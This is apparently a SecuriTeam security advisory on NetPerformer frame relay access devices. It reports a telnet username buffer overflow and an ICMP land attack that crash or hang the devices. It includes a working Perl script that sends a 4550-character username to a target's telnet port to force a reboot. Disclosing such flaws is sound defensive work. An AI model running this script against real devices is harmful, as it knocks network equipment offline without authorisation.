[NEWS] NetPerformer Frame Relay Access Device (FRAD) ACT Multiple Vulnerabilities

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



NetPerformer Frame Relay Access Device (FRAD) ACT Multiple Vulnerabilities
------------------------------------------------------------------------


SUMMARY

<http://www.netperformer.com> NetPerformer Frame Relay Access Device
(FRAD) is "switching & routing device that support Ethernet and SNA
protocols, Voice, etc. This device mainly used for connecting distributed
WAN network through frame relay or ATM network". Two security
vulnerabilities have been discovered in NetPerformer allow remote
attackers to cause the server to crash.

DETAILS

Vulnerable Systems:
* NetPerformer FRAD ACT SDM-95xx version 7.xx (R1)
* NetPerformer FRAD ACT SDM-93xx version 10.x.x (R2)
* NetPerformer FRAD ACT SDM-92xx version 9.x.x (R1)

1. Telnet long username Buffer Overflow
Passing an overly long username (>4550 char) against telnet service causes
device to reboot. Successful remote exploitation will possibly allows an
attacker gaining access into the device.

Exploit:
#!/usr/bin/perl

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],

PeerPort => "23",

Proto => "TCP"))
{
print "Modhiar'000 ..... killing netperformer ...
$ARGV[0] port 23...";
sleep(1);
print $socket "LOGIN " . "A" x 4550 . "BCDE\r\n";
sleep(1);
print $socket "PASS " . "\r\n";
close($socket);
}
else
{
print "Cannot connect to $ARGV[0]:23\n";
}
# __END_CODE

2. ICMP Land Attack
By sending specially crafted ICMP packets will causes the device to be
hang up and resetting current TCP handshake connection. In earlier version
possibly will make device to reboot.


ADDITIONAL INFORMATION

The information has been provided by
<mailto:arif.jatmoko@xxxxxxxxxxxxxxxx> Arif Jatmoko.



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages